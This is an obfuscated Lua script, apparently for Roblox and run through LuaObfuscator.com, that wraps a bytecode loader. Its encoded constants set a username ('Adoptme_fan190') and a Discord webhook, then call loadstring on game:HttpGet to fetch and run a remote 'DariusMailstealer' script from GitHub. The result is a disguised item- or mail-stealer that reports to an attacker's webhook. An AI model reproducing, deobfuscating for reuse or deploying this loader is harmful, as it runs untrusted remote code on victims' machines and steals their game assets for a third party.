--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v99=v5(v84,v19);v19=nil;return v99;else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=0;local v86;while true do if (v85==(0 -0)) then v86=(v31/((5 -3)^(v32-(1638 -(1523 + 114)))))%((2 + 0)^(((v33-(1 -0)) -(v32-((2 -0) -1))) + (620 -(555 + 64)))) ;return v86-(v86%(932 -(857 + 74))) ;end end else local v87=568 -(367 + 201) ;local v88;while true do if (v87==(927 -(214 + 713))) then v88=2^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=1065 -(68 + 997) ;local v35;while true do if ((1270 -(226 + 1044))==v34) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end if (v34==(1 + 0 + 0)) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + ((9 -5) -(1 + 0)) );v18=v18 + 4 ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * ((747 -559) + 68)) + v38 ;end local function v24()local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + (2 -1))) then v47=v20(v44,56 -(137 -102) ,55 -24 );v48=((v20(v44,24 + 8 )==(998 -(915 + 82))) and  -(4 -3)) or ((1057 -(87 + 968)) -1) ;v42=2 + 1 ;end if ((3 -0)==v42) then if (v47==(1187 -(1069 + 118))) then if (v46==(0 -0)) then return v48 * (859 -(7 + 807 + 45)) ;else local v100=0 -0 ;while true do if (v100==((0 -0) -0)) then v47=1 + 0 + 0 ;v45=(0 -0) + (1413 -(447 + 966)) ;break;end end end elseif (v47==(3636 -1589)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((6 -4)^((191 -121) -(10 + (1825 -(1703 + 114))))))) ;end if (v42==(3 -2)) then v45=443 -(416 + 26) ;v46=(v20(v44,1 + 0 + 0 ,63 -43 ) * ((1 + 1)^(56 -(725 -(376 + 325))))) + v43 ;v42=1915 -(1789 + 124) ;end if (v42==(438 -(145 + 293))) then v43=v23();v44=v23();v42=431 -(44 + 386) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v66=2 -1 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1288 -(993 + 295) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(1 + 0)) then local v91=1171 -(418 + 753) ;while true do if (v91~=0) then else v55=nil;v56=nil;v91=1;end if (v91~=(1 + 0)) then else v52=1 + 1 ;break;end end end if (v52==(1 + 1)) then v57=nil;v58=nil;v52=3;end if (v52~=(0 + 0)) then else v53=0;v54=nil;v52=1;end if (v52==(532 -(406 + 123))) then v59=nil;while true do local v92=0;while true do if (v92==(1770 -(1749 + 20))) then if (0~=v53) then else local v101=0 + 0 ;while true do if (v101~=(1323 -(1249 + 73))) then else v56={};v53=1;break;end if (v101==0) then v54={};v55={};v101=1;end end end if (v53~=3) then else local v102=0 + 0 ;local v103;while true do if (v102~=0) then else v103=1145 -(466 + 679) ;while true do if (v103==(0 -0)) then local v130=0 -0 ;while true do if (v130==(1900 -(106 + 1794))) then for v172=1,v23() do v55[v172-1 ]=v28();end return v57;end end end end break;end end end break;end if (v92==(0 + 0)) then if (v53==2) then local v104=0;while true do if (v104==(0 + 0)) then for v107=1,v58 do local v108=0 -0 ;local v109;local v110;while true do if (v108==(2 -1)) then if (v109==(115 -(4 + 110))) then v110=v21()~=0 ;elseif (v109==(586 -(57 + 527))) then v110=v24();elseif (v109~=(1430 -(41 + 1386))) then else v110=v25();end v59[v107]=v110;break;end if (v108==(103 -(17 + 86))) then local v155=0;while true do if (1==v155) then v108=1;break;end if (v155~=(0 + 0)) then else v109=v21();v110=nil;v155=1;end end end end end v57[3]=v21();v104=1 -0 ;end if ((2 -1)==v104) then for v111=1,v23() do local v112=166 -(122 + 44) ;local v113;while true do if ((0 -0)==v112) then v113=v21();if (v20(v113,3 -2 ,1)==(0 + 0)) then local v165=0;local v166;local v167;local v168;local v169;local v170;local v171;while true do if (v165~=(0 + 0)) then else v166=0;v167=nil;v165=1 -0 ;end if (v165~=3) then else while true do if (v166==(65 -(30 + 35))) then local v174=0;while true do if (v174~=(0 + 0)) then else v167=1257 -(1043 + 214) ;v168=nil;v174=1;end if (v174==(3 -2)) then v166=1;break;end end end if (v166==(1214 -(323 + 889))) then v171=nil;while true do if (v167==(0 -0)) then local v176=580 -(361 + 219) ;while true do if (v176~=(320 -(53 + 267))) then else v168=0 + 0 ;v169=nil;v176=414 -(15 + 398) ;end if (v176~=(983 -(18 + 964))) then else v167=1;break;end end end if (v167==1) then local v177=0;while true do if (1==v177) then v167=7 -5 ;break;end if (v177==0) then v170=nil;v171=nil;v177=1;end end end if (v167~=(2 + 0)) then else while true do if (v168==(2 + 1)) then if (v20(v170,3,3)~=1) then else v171[4]=v59[v171[854 -(20 + 830) ]];end v54[v111]=v171;break;end if (1==v168) then local v179=0;while true do if (v179==(0 + 0)) then local v187=0;local v188;while true do if (0==v187) then v188=126 -(116 + 10) ;while true do if (v188==1) then v179=1 + 0 ;break;end if (v188==0) then local v190=0;while true do if (v190==(738 -(542 + 196))) then v171={v22(),v22(),nil,nil};if (v169==(0 + 0)) then local v192=0;local v193;while true do if (v192~=(0 -0)) then else v193=0 -0 ;while true do if ((1551 -(1126 + 425))~=v193) then else v171[3]=v22();v171[4]=v22();break;end end break;end end elseif (v169==(406 -(118 + 287))) then v171[11 -8 ]=v23();elseif (v169==(1123 -(118 + 1003))) then v171[3]=v23() -((5 -3)^(393 -(142 + 235))) ;elseif (v169~=3) then else local v202=0;local v203;local v204;while true do if (0~=v202) then else v203=0;v204=nil;v202=1;end if (v202==1) then while true do if (v203==(0 -0)) then v204=0;while true do if (v204==(0 + 0)) then v171[980 -(553 + 424) ]=v23() -((3 -1)^(15 + 1)) ;v171[4]=v22();break;end end break;end end break;end end end v190=1;end if ((1 + 0)==v190) then v188=1;break;end end end end break;end end end if (1==v179) then v168=2;break;end end end if ((2 + 0)==v168) then local v180=0;local v181;local v182;while true do if ((0 + 0)==v180) then v181=0;v182=nil;v180=1;end if (v180==1) then while true do if (v181~=0) then else v182=0 + 0 ;while true do if (v182~=(0 -0)) then else local v191=0;while true do if ((0 -0)==v191) then if (v20(v170,2 -1 ,1)~=1) then else v171[1 + 1 ]=v59[v171[9 -7 ]];end if (v20(v170,2,755 -(239 + 514) )==(1 + 0)) then v171[1332 -(797 + 532) ]=v59[v171[3 + 0 ]];end v191=1;end if (v191==(1 + 0)) then v182=2 -1 ;break;end end end if (v182==(1203 -(373 + 829))) then v168=734 -(476 + 255) ;break;end end break;end end break;end end end if (v168~=(1130 -(369 + 761))) then else local v183=0 + 0 ;local v184;while true do if (v183==(0 -0)) then v184=0 -0 ;while true do if (v184~=1) then else v168=1;break;end if (v184~=0) then else local v189=0;while true do if ((239 -(64 + 174))~=v189) then else v184=1 + 0 ;break;end if (v189~=(0 -0)) then else v169=v20(v113,2,339 -(144 + 192) );v170=v20(v113,220 -(42 + 174) ,6);v189=1;end end end end break;end end end end break;end end break;end if (v166==1) then local v175=0;while true do if (v175~=(1 + 0)) then else v166=2 + 0 ;break;end if (v175==0) then v169=nil;v170=nil;v175=1;end end end end break;end if (1~=v165) then else v168=nil;v169=nil;v165=1 + 1 ;end if (2~=v165) then else v170=nil;v171=nil;v165=1507 -(363 + 1141) ;end end end break;end end end v53=3;break;end end end if (v53~=(1581 -(1183 + 397))) then else local v105=0;while true do if (v105~=1) then else v59={};v53=5 -3 ;break;end if (v105~=0) then else v57={v54,v55,nil,v56};v58=v23();v105=1 + 0 ;end end end v92=2 -1 ;end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v89=0,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=v75[v89 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v90=0;while true do if (v90==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then v72=v80[3];else do return;end end elseif (v81<=2) then v72=v80[3];elseif (v81==3) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=7) then if (v81<=5) then v62[v80[3]]=v78[v80[2]];elseif (v81==6) then v78[v80[2]]=v62[v80[3]];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=8) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v156=v136,v73 do v139=v139 + 1 ;v78[v156]=v137[v139];end end elseif (v81<=15) then if (v81<=12) then if (v81>11) then local v119=v80[2];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));else v62[v80[3]]=v78[v80[2]];end elseif (v81<=13) then local v123=0;local v124;local v125;local v126;local v127;while true do if (v123==2) then for v161=v124,v73 do v127=v127 + 1 ;v78[v161]=v125[v127];end break;end if (v123==1) then v73=(v126 + v124) -1 ;v127=0;v123=2;end if (v123==0) then v124=v80[2];v125,v126=v71(v78[v124](v13(v78,v124 + 1 ,v80[3])));v123=1;end end elseif (v81>14) then local v140=v80[2];local v141=v78[v80[3]];v78[v140 + 1 ]=v141;v78[v140]=v141[v80[4]];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=18) then if (v81<=16) then local v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));elseif (v81==17) then local v147=v80[2];local v148=v78[v80[3]];v78[v147 + 1 ]=v148;v78[v147]=v148[v80[4]];else v78[v80[2]]=v80[3];end elseif (v81<=19) then do return;end elseif (v81>20) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]();end v72=v72 + 1 ;break;end if (v90==0) then v80=v68[v72];v81=v80[1];v90=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030E3O0041646F70746D655F66616E313930030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F636F6465723534392F446172697573536372697074732F6D61696E2F4461726975734D61696C737465616C657203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O34383638323835302O36373933302O312F50764A2D31734E432O335765344551557862425634396465575A6F72453748456E735F306245584D7A564C736F38725A443879385A6D585636395078776E484F5A2O775A00173O0012033O00013O0026153O000E0001000200044O000E0001001203000100043O00120B000100033O00120E000100053O00120E000200063O002011000200020007001203000400084O0008000500014O000A000200054O000C00013O00022O001400010001000100044O001600010026153O00010001000100044O00010001001203000100043O00120B000100093O0012030001000B3O00120B0001000A3O0012033O00023O00044O000100012O00013O00017O00",v9(),...);
